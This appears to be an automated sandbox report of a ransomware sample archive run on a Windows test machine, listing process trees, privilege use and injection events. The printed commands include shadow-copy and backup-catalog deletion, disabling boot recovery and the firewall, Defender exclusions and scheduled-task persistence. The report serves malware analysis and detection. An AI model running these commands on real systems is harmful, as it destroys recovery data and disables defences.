description pid Process Token: SeRestorePrivilege 1984 7zFM.exe Token: 35 1984 7zFM.exe Token: SeSecurityPrivilege 1984 7zFM.exe Token: SeDebugPrivilege 4824 powershell.exe Token: SeDebugPrivilege 3208 taskmgr.exe Token: SeSystemProfilePrivilege 3208 taskmgr.exe Token: SeCreateGlobalPrivilege 3208 taskmgr.exe Token: SeDebugPrivilege 4536 taskmgr.exe Token: SeSystemProfilePrivilege 4536 taskmgr.exe Token: SeCreateGlobalPrivilege 4536 taskmgr.exe Token: 33 3208 taskmgr.exe Token: SeIncBasePriorityPrivilege 3208 taskmgr.exe Token: SeDebugPrivilege 3176 HEUR-Trojan-Ransom.MSIL.Blocker.gen-75f615f27b23cc56767ed8b3e684d69b27376165432116913f30cbc12c439fb2.exe Token: SeDebugPrivilege 1328 HEUR-Trojan-Ransom.MSIL.Agent.gen-5bdf63530fc9ab47e57a92a17a627b93c668d313742b989819252ee5152a9061.exe Token: SeDebugPrivilege 964 HEUR-Trojan-Ransom.Win32.Crypmod.gen-50234101339d8a152f9c0c111c6e5fac70826d53cd1480d224a422b7182ec0f0.exe Token: SeDebugPrivilege 4984 HEUR-Trojan-Ransom.MSIL.Encoder.gen-412fbcec0b5aa0fd7d09b18ef80d6bbda8026908c99f9f0c58351c52b5ee6ae6.exe Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 4032 HEUR-Trojan-Ransom.Win32.Crypmod.gen-8b6f0bbead4faeb094314e83e1f1b05d8c81b2102ccea0defdbd5df0f035a47f.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeIncreaseQuotaPrivilege 1140 powershell.exe Token: SeSecurityPrivilege 1140 powershell.exe Token: SeTakeOwnershipPrivilege 1140 powershell.exe Token: SeLoadDriverPrivilege 1140 powershell.exe Token: SeSystemProfilePrivilege 1140 powershell.exe Token: SeSystemtimePrivilege 1140 powershell.exe Token: SeProfSingleProcessPrivilege 1140 powershell.exe Token: SeIncBasePriorityPrivilege 1140 powershell.exe Token: SeCreatePagefilePrivilege 1140 powershell.exe Token: SeBackupPrivilege 1140 powershell.exe Token: SeRestorePrivilege 1140 powershell.exe Token: SeShutdownPrivilege 1140 powershell.exe Token: SeDebugPrivilege 1140 powershell.exe Token: SeSystemEnvironmentPrivilege 1140 powershell.exe Token: SeRemoteShutdownPrivilege 1140 powershell.exe Token: SeUndockPrivilege 1140 powershell.exe Token: SeManageVolumePrivilege 1140 powershell.exe Token: 33 1140 powershell.exe Token: 34 1140 powershell.exe Token: 35 1140 powershell.exe Token: 36 1140 powershell.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeLoadDriverPrivilege 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Token: SeIncreaseQuotaPrivilege 1140 powershell.exe Token: SeSecurityPrivilege 1140 powershell.exe Token: SeTakeOwnershipPrivilege 1140 powershell.exe Token: SeLoadDriverPrivilege 1140 powershell.exe Token: SeSystemProfilePrivilege 1140 powershell.exe Token: SeSystemtimePrivilege 1140 powershell.exe Token: SeProfSingleProcessPrivilege 1140 powershell.exe Token: SeIncBasePriorityPrivilege 1140 powershell.exe Token: SeCreatePagefilePrivilege 1140 powershell.exe Token: SeBackupPrivilege 1140 powershell.exe Token: SeRestorePrivilege 1140 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1984 7zFM.exe 1984 7zFM.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4008 OpenWith.exe -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 4824 wrote to memory of 4320 4824 powershell.exe 98 PID 4824 wrote to memory of 4320 4824 powershell.exe 98 PID 3208 wrote to memory of 4536 3208 taskmgr.exe 101 PID 3208 wrote to memory of 4536 3208 taskmgr.exe 101 PID 4320 wrote to memory of 1328 4320 cmd.exe 102 PID 4320 wrote to memory of 1328 4320 cmd.exe 102 PID 4320 wrote to memory of 1328 4320 cmd.exe 102 PID 4320 wrote to memory of 3176 4320 cmd.exe 103 PID 4320 wrote to memory of 3176 4320 cmd.exe 103 PID 4320 wrote to memory of 3176 4320 cmd.exe 103 PID 4320 wrote to memory of 4632 4320 cmd.exe 104 PID 4320 wrote to memory of 4632 4320 cmd.exe 104 PID 4320 wrote to memory of 4632 4320 cmd.exe 104 PID 4632 wrote to memory of 3256 4632 HEUR-Trojan-Ransom.MSIL.Blocker.gen-7e9ab70cccff28f533cdefc0608d02de489bf9c1493c931499b5b01e257585bb.exe 105 PID 4632 wrote to memory of 3256 4632 HEUR-Trojan-Ransom.MSIL.Blocker.gen-7e9ab70cccff28f533cdefc0608d02de489bf9c1493c931499b5b01e257585bb.exe 105 PID 4632 wrote to memory of 3256 4632 HEUR-Trojan-Ransom.MSIL.Blocker.gen-7e9ab70cccff28f533cdefc0608d02de489bf9c1493c931499b5b01e257585bb.exe 105 PID 4632 wrote to memory of 1740 4632 HEUR-Trojan-Ransom.MSIL.Blocker.gen-7e9ab70cccff28f533cdefc0608d02de489bf9c1493c931499b5b01e257585bb.exe 107 PID 4632 wrote to memory of 1740 4632 HEUR-Trojan-Ransom.MSIL.Blocker.gen-7e9ab70cccff28f533cdefc0608d02de489bf9c1493c931499b5b01e257585bb.exe 107 PID 4632 wrote to memory of 1740 4632 HEUR-Trojan-Ransom.MSIL.Blocker.gen-7e9ab70cccff28f533cdefc0608d02de489bf9c1493c931499b5b01e257585bb.exe 107 PID 4320 wrote to memory of 2340 4320 cmd.exe 106 PID 4320 wrote to memory of 2340 4320 cmd.exe 106 PID 4320 wrote to memory of 4984 4320 cmd.exe 110 PID 4320 wrote to memory of 4984 4320 cmd.exe 110 PID 4320 wrote to memory of 4984 4320 cmd.exe 110 PID 4320 wrote to memory of 1456 4320 cmd.exe 111 PID 4320 wrote to memory of 1456 4320 cmd.exe 111 PID 4320 wrote to memory of 1456 4320 cmd.exe 111 PID 1740 wrote to memory of 2768 1740 cmd.exe 112 PID 1740 wrote to memory of 2768 1740 cmd.exe 112 PID 1740 wrote to memory of 2768 1740 cmd.exe 112 PID 3256 wrote to memory of 4568 3256 cmd.exe 113 PID 3256 wrote to memory of 4568 3256 cmd.exe 113 PID 2768 wrote to memory of 2908 2768 Codec.exe 114 PID 2768 wrote to memory of 2908 2768 Codec.exe 114 PID 2768 wrote to memory of 2908 2768 Codec.exe 114 PID 4320 wrote to memory of 964 4320 cmd.exe 115 PID 4320 wrote to memory of 964 4320 cmd.exe 115 PID 4320 wrote to memory of 964 4320 cmd.exe 115 PID 4568 wrote to memory of 1140 4568 explorer.exe 116 PID 4568 wrote to memory of 1140 4568 explorer.exe 116 PID 1456 wrote to memory of 4484 1456 HEUR-Trojan-Ransom.Win32.Blocker.pef-f63819c6d8237b4bdebed3897b3a3f5a2f7bbc9ad1a7b44fa0668a3359f31a99.exe 117 PID 1456 wrote to memory of 4484 1456 HEUR-Trojan-Ransom.Win32.Blocker.pef-f63819c6d8237b4bdebed3897b3a3f5a2f7bbc9ad1a7b44fa0668a3359f31a99.exe 117 PID 1456 wrote to memory of 4484 1456 HEUR-Trojan-Ransom.Win32.Blocker.pef-f63819c6d8237b4bdebed3897b3a3f5a2f7bbc9ad1a7b44fa0668a3359f31a99.exe 117 PID 4320 wrote to memory of 4032 4320 cmd.exe 119 PID 4320 wrote to memory of 4032 4320 cmd.exe 119 PID 4320 wrote to memory of 4032 4320 cmd.exe 119 PID 4320 wrote to memory of 1008 4320 cmd.exe 120 PID 4320 wrote to memory of 1008 4320 cmd.exe 120 PID 4320 wrote to memory of 1112 4320 cmd.exe 204 PID 4320 wrote to memory of 1112 4320 cmd.exe 204 PID 4320 wrote to memory of 1604 4320 cmd.exe 124 PID 4320 wrote to memory of 1604 4320 cmd.exe 124 PID 4320 wrote to memory of 3236 4320 cmd.exe 125 PID 4320 wrote to memory of 3236 4320 cmd.exe 125 PID 4320 wrote to memory of 3236 4320 cmd.exe 125 PID 4320 wrote to memory of 3876 4320 cmd.exe 126 PID 4320 wrote to memory of 3876 4320 cmd.exe 126 PID 4320 wrote to memory of 3876 4320 cmd.exe 126 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 8100 attrib.exe 6416 attrib.exe 6140 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00481.7z1⤵
- Modifies registry class
PID:2360
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4008
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4736
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00481.7z"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.MSIL.Agent.gen-5bdf63530fc9ab47e57a92a17a627b93c668d313742b989819252ee5152a9061.exeHEUR-Trojan-Ransom.MSIL.Agent.gen-5bdf63530fc9ab47e57a92a17a627b93c668d313742b989819252ee5152a9061.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.MSIL.Blocker.gen-75f615f27b23cc56767ed8b3e684d69b27376165432116913f30cbc12c439fb2.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-75f615f27b23cc56767ed8b3e684d69b27376165432116913f30cbc12c439fb2.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.MSIL.Blocker.gen-7e9ab70cccff28f533cdefc0608d02de489bf9c1493c931499b5b01e257585bb.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-7e9ab70cccff28f533cdefc0608d02de489bf9c1493c931499b5b01e257585bb.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Users\Admin\AppData\Local\Temp\explorer.exeC:\Users\Admin\AppData\Local\Temp\explorer.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com , www.youtube.com , www.yahoo.com , www.youtube.com ,www.google.com , www.youtube.com6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\Codec.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Users\Admin\AppData\Local\Temp\Codec.exeC:\Users\Admin\AppData\Local\Temp\Codec.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Users\Admin\AppData\Local\Temp\is-LDUV6.tmp\Codec.tmp"C:\Users\Admin\AppData\Local\Temp\is-LDUV6.tmp\Codec.tmp" /SL5="$2037C,119392,114176,C:\Users\Admin\AppData\Local\Temp\Codec.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2908
-
-
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a7cfc747d2b20fbbd20f8121c26b46041101e14b0c912afa3e220239f146685e.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-a7cfc747d2b20fbbd20f8121c26b46041101e14b0c912afa3e220239f146685e.exe3⤵
- Executes dropped EXE
PID:2340 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" #/k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Microsoft\Airexpress & exit4⤵PID:6900
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Microsoft\Airexpress5⤵
- Command and Scripting Interpreter: PowerShell
PID:3796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" #/k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Holocryptic\Crossbarre.exe & exit4⤵PID:6728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Holocryptic\Crossbarre.exe5⤵
- Command and Scripting Interpreter: PowerShell
PID:3888
-
-
-
C:\Windows\System32\ipconfig.exe"C:\Windows\System32\ipconfig.exe" flushdns4⤵
- Gathers network information
PID:5696
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /delete /tn Service /f4⤵PID:5600
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /sc minute /mo 10 /tn Service /tr "C:\Windows\system32\Holocryptic\Crossbarre.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3760
-
-
C:\Windows\system32\Holocryptic\Crossbarre.exe"C:\Windows\system32\Holocryptic\Crossbarre.exe"4⤵PID:7564
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe/Processid:{0a52d887-c53b-4a50-a125-d38c5aaa675f}4⤵PID:6356
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.MSIL.Encoder.gen-412fbcec0b5aa0fd7d09b18ef80d6bbda8026908c99f9f0c58351c52b5ee6ae6.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-412fbcec0b5aa0fd7d09b18ef80d6bbda8026908c99f9f0c58351c52b5ee6ae6.exe3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Blocker.pef-f63819c6d8237b4bdebed3897b3a3f5a2f7bbc9ad1a7b44fa0668a3359f31a99.exeHEUR-Trojan-Ransom.Win32.Blocker.pef-f63819c6d8237b4bdebed3897b3a3f5a2f7bbc9ad1a7b44fa0668a3359f31a99.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4484
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Crypmod.gen-50234101339d8a152f9c0c111c6e5fac70826d53cd1480d224a422b7182ec0f0.exeHEUR-Trojan-Ransom.Win32.Crypmod.gen-50234101339d8a152f9c0c111c6e5fac70826d53cd1480d224a422b7182ec0f0.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:964 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\00481\HEUR-T~1.BAT4⤵PID:1056
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Crypmod.gen-8b6f0bbead4faeb094314e83e1f1b05d8c81b2102ccea0defdbd5df0f035a47f.exeHEUR-Trojan-Ransom.Win32.Crypmod.gen-8b6f0bbead4faeb094314e83e1f1b05d8c81b2102ccea0defdbd5df0f035a47f.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\00481\HEUR-T~2.BAT4⤵PID:7976
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-9c5113ae60fa19421e1d90ba13cc5a0ae4b675ae3ba5a2e4de8aae2ece779543.exeHEUR-Trojan-Ransom.Win32.Crypmodadv.vho-9c5113ae60fa19421e1d90ba13cc5a0ae4b675ae3ba5a2e4de8aae2ece779543.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1008
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-be172fac0466cdc031266dc30e9495a0e71449e8b03f88f9fb4a7a231946796c.exeHEUR-Trojan-Ransom.Win32.Crypmodadv.vho-be172fac0466cdc031266dc30e9495a0e71449e8b03f88f9fb4a7a231946796c.exe3⤵
- Executes dropped EXE
PID:1112
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-dc9742ddc4a89ef7e38a1a60cafceaffd6cd7d2cd59b5bac941fc81010696b6e.exeHEUR-Trojan-Ransom.Win32.Cryptoff.vho-dc9742ddc4a89ef7e38a1a60cafceaffd6cd7d2cd59b5bac941fc81010696b6e.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1604
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exeHEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3236 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 4884⤵
- Program crash
PID:5840
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exeHEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:3876
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Generic-b79565748d4e057ce732761bbeaa5578cb18f12c1890cdecd78a86e16fedd937.exeHEUR-Trojan-Ransom.Win32.Generic-b79565748d4e057ce732761bbeaa5578cb18f12c1890cdecd78a86e16fedd937.exe3⤵PID:3388
-
C:\Users\Admin\AppData\Roaming\Accessibility:binC:\Users\Admin\AppData\Roaming\Accessibility:bin -r4⤵PID:2540
-
C:\Windows\system32\vssadmin.exeC:\Windows\system32\vssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
PID:392
-
-
C:\Windows\SysWOW64\takeown.exeC:\Windows\system32\takeown.exe /F C:\Windows\system32\Accessibility.exe5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5804
-
-
C:\Windows\SysWOW64\icacls.exeC:\Windows\system32\icacls.exe C:\Windows\system32\Accessibility.exe /reset5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7200
-
-
C:\Windows\SysWOW64\cmd.execmd /c choice /t 10 /d y & attrib -h "C:\Users\Admin\AppData\Roaming\Accessibility" & del "C:\Users\Admin\AppData\Roaming\Accessibility"5⤵PID:7208
-
C:\Windows\SysWOW64\choice.exechoice /t 10 /d y6⤵PID:5804
-
-
C:\Windows\SysWOW64\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\Accessibility"6⤵
- Views/modifies file attributes
PID:6140
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c choice /t 10 /d y & attrib -h "C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Generic-b79565748d4e057ce732761bbeaa5578cb18f12c1890cdecd78a86e16fedd937.exe" & del "C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Generic-b79565748d4e057ce732761bbeaa5578cb18f12c1890cdecd78a86e16fedd937.exe"4⤵PID:292
-
C:\Windows\SysWOW64\choice.exechoice /t 10 /d y5⤵PID:7732
-
-
C:\Windows\SysWOW64\attrib.exeattrib -h "C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Generic-b79565748d4e057ce732761bbeaa5578cb18f12c1890cdecd78a86e16fedd937.exe"5⤵
- Views/modifies file attributes
PID:6416
-
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Locky.gen-a249f9af6a0d1bbf1e93c5b32944b5124cb6c7dc72051d96cae343b8ee78361e.exeHEUR-Trojan-Ransom.Win32.Locky.gen-a249f9af6a0d1bbf1e93c5b32944b5124cb6c7dc72051d96cae343b8ee78361e.exe3⤵PID:4764
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Locky.gen-a249f9af6a0d1bbf1e93c5b32944b5124cb6c7dc72051d96cae343b8ee78361e.exeHEUR-Trojan-Ransom.Win32.Locky.gen-a249f9af6a0d1bbf1e93c5b32944b5124cb6c7dc72051d96cae343b8ee78361e.exe4⤵PID:1952
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Phobos.vho-ec21b0fae8166d18ea5f9dddd8fdbb5fe26dd62903d3173388b97208d724f3c8.exeHEUR-Trojan-Ransom.Win32.Phobos.vho-ec21b0fae8166d18ea5f9dddd8fdbb5fe26dd62903d3173388b97208d724f3c8.exe3⤵PID:1216
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Phobos.vho-ec21b0fae8166d18ea5f9dddd8fdbb5fe26dd62903d3173388b97208d724f3c8.exe"C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Phobos.vho-ec21b0fae8166d18ea5f9dddd8fdbb5fe26dd62903d3173388b97208d724f3c8.exe"4⤵PID:2344
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:1940
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off5⤵
- Modifies Windows Firewall
PID:6848
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=disable5⤵
- Modifies Windows Firewall
PID:6160
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:4004
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:6892
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:6084
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:7136
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:6672
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet5⤵
- Deletes backup catalog
PID:6396
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}4⤵PID:5280
-
-
